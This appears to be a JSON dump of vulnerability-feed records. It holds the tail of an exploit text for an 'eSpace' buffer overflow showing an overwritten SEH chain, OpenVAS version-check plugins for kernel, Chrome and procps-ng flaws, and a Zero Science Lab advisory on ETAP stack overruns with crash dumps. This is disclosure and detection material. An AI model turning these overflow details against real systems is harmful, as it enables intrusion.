\n0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e. \n0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l..... \n0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p....... \n0:000> !exchain \n0012e37c: 00430043 \nInvalid exception stack at 00420042 \n''' \nelse: \nprint '[+] Have a nice day! 
^^\\n' \nquit() \n \nprint '\\n[+] Have a nice day! ^^\\n' \n#os.system('color 07') \n`\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152965/espace_epoll2.txt"}], "openvas": [{"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310874620", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874620", "title": "Fedora Update for kernel FEDORA-2018-537c8312fc", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_537c8312fc_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-537c8312fc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874620\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 06:01:28 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\",\n \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-537c8312fc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-537c8312fc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/URE7VVHJMM7PDSJTK3THYADBW7TTXPFT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.12~300.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:51", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813504", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813504\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:46 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - 
Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813505", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813505\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 10:55:29 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - 
Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813503", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813503\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:15 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect 
mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "description": "Check the version of procps-ng", "modified": "2019-03-08T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310882892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882892", "title": "CentOS Update for procps-ng CESA-2018:1700 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1700_procps-ng_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for procps-ng CESA-2018:1700 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882892\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 05:47:22 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-1124\", \"CVE-2018-1126\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for procps-ng CESA-2018:1700 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of procps-ng\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The procps-ng packages contain a set of system utilities that provide\nsystem information, including ps, free, skill, pkill, pgrep, snice, tload,\ntop, uptime, vmstat, w, watch, and pwdx.\n\nSecurity Fix(es):\n\n * procps-ng, procps: Integer overflows leading to heap overflow in\nfile2strvec (CVE-2018-1124)\n\n * procps-ng, procps: incorrect integer size in proc/alloc.* leading to\ntruncation / integer overflow issues (CVE-2018-1126)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank Qualys Research Labs for reporting these\nissues.\");\n script_tag(name:\"affected\", value:\"procps-ng on CentOS 7\");\n script_tag(name:\"solution\", 
value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1700\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022847.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"procps-ng\", rpm:\"procps-ng~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"procps-ng-devel\", rpm:\"procps-ng-devel~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"procps-ng-i18n\", rpm:\"procps-ng-i18n~3.3.10~17.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zeroscience": [{"lastseen": "2019-11-11T16:11:28", "bulletinFamily": "exploit", "description": "Title: Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities \nAdvisory ID: [ZSL-2016-5324](<ZSL-2016-5324.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 22.05.2016 \n\n\n##### Summary\n\nEnterprise Software Solution for Electrical Power Systems. ETAP is the most comprehensive electrical engineering software platform for the design, simulation, operation, and automation of generation, transmission, distribution, and industrial systems. 
As a fully integrated model-driven enterprise solution, ETAP extends from modeling to operation to offer a Real-Time Power Management System. \n\n##### Description\n\nMultiple ETAP binaries are prone to a stack-based buffer overflow vulnerability because the application fails to handle malformed arguments. An attacker can exploit these issues to execute arbitrary code within the context of the application or to trigger denial-of-service conditions. \n \n\\-------------------------------------------------------------------------------- \n \n` STATUS_STACK_BUFFER_OVERRUN encountered \n(380c.3cc4): Break instruction exception - code 80000003 (first chance) \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \n*** WARNING: Unable to verify checksum for SO3Ph.exe \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - \nkernel32!UnhandledExceptionFilter+0x71: \n00000000`76fcb8c1 cc int 3 \n0:000> r \nrax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000 \nrdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002 \nrip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff \nr8=0000000000000000 r9=0000000000000000 r10=0000000000000000 \nr11=00000000000fe310 r12=0000000140086150 r13=0000000000000000 \nr14=000000000012eb00 r15=0000000000000000 \niopl=0 nv up ei pl nz na po nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 \nkernel32!UnhandledExceptionFilter+0x71: \n00000000`76fcb8c1 cc int 3 \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nOperation Technology, Inc. - <http://www.etap.com>\n\n##### Affected Version\n\n14.1.0.0 \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) x86_64 \nMicrosoft Windows 7 Ultimate SP1 (EN) x86_64 \n\n##### Vendor Status\n\n[07.04.2016] Vulnerabilities discovered. \n[11.04.2016] Vendor contacted. 
\n[21.05.2016] No response from the vendor. \n[22.05.2016] Public security advisory released. \n\n##### PoC\n\n[etap_bof.txt](<../../codes/etap_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2016050107> \n[2] <https://www.exploit-db.com/exploits/39846/> \n[3] <https://packetstormsecurity.com/files/137145> \n[4] <http://www.vfocus.net/art/20160524/12702.html> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/113434>\n\n##### Changelog\n\n[22.05.2016] - Initial release \n[23.05.2016] - Added reference [1], [2] and [3] \n[25.05.2016] - Added reference [4] \n[27.05.2016] - Added reference [5] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-05-22T00:00:00", "published": "2016-05-22T00:00:00", "id": "ZSL-2016-5324", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php", "title": "Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", 
"cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/etap_bof.txt"}]}